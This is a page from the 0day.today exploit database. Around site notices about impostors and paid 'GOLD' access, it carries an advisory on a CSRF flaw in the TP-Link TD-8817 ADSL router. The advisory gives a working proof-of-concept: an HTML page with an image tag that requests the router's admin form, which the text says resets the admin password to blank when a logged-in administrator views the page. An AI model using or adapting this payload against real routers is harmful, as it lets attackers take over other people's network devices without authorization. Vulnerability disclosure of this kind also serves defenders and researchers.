0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TP-Link TD-8817 CSRF Vulnerability
====================================================================== _ _ _____ __ __ | | | | | _ | \ \ / / | | | |_ __ | |/' |_ ___ __ \ V / | | | | '_ \| /| \ \ /\ / / '_ \ / \ | |_| | | | \ |_/ /\ V V /| | | | / /^\ \ \___/|_| |_|\___/ \_/\_/ |_| |_| \/ \/ ______ |______| ====================================================================== ###################################################################### # Exploit Title: TP-Link TD-8817 CSRF Vulnerability # Author: Un0wn_X # E-mail: unownsec@gmail.com # Category: Hardware # Google Dork: N/A # Vendor: http://www.tp-link.com # Version: TD-W8901G # Firmware Version: 6.0.1 Build 111128 Rel.26763 # Product: http://www.tp-link.com/lk/products/details/?model=TD-8817 # Tested on: Windows 7 64-bit # PoC video: http://www.youtube.com/watch?v=8xJGkRQB0QM ###################################################################### #Introduction ============== TP-Link TD-8817 is a ADSL2+ Ethernet/USB Modem Router which works with a 24-Mbps downstream connection. #Description of Vulnerability ============================= You can easily change the default user's (admin) password by the default router page listning on tcp/ip port 80. In here you the $_GET will change the password for you and the $_POST request method is not needed for changing the router pass. #Exploit ======== <html> <!-- TP-Link TD-8817 CSRF Explpoit --> <body> <img src="http://192.168.1.1/Forms/tools_admin_1"/> </body> </html> ========== Save this as csrf.html and this will change the router password to blank if the current user admin visits this page his password will be resetted to blank. You can login with the username admin and password (blank). #Greetz to G2, Zer0Freak, HR aka MrGreen, Divine, Keeper,SubZer0, zer0time, Zer0wl, Cyb_iDioT, Prominent, Raw-x, Kasper # 0day.today [2024-12-25] #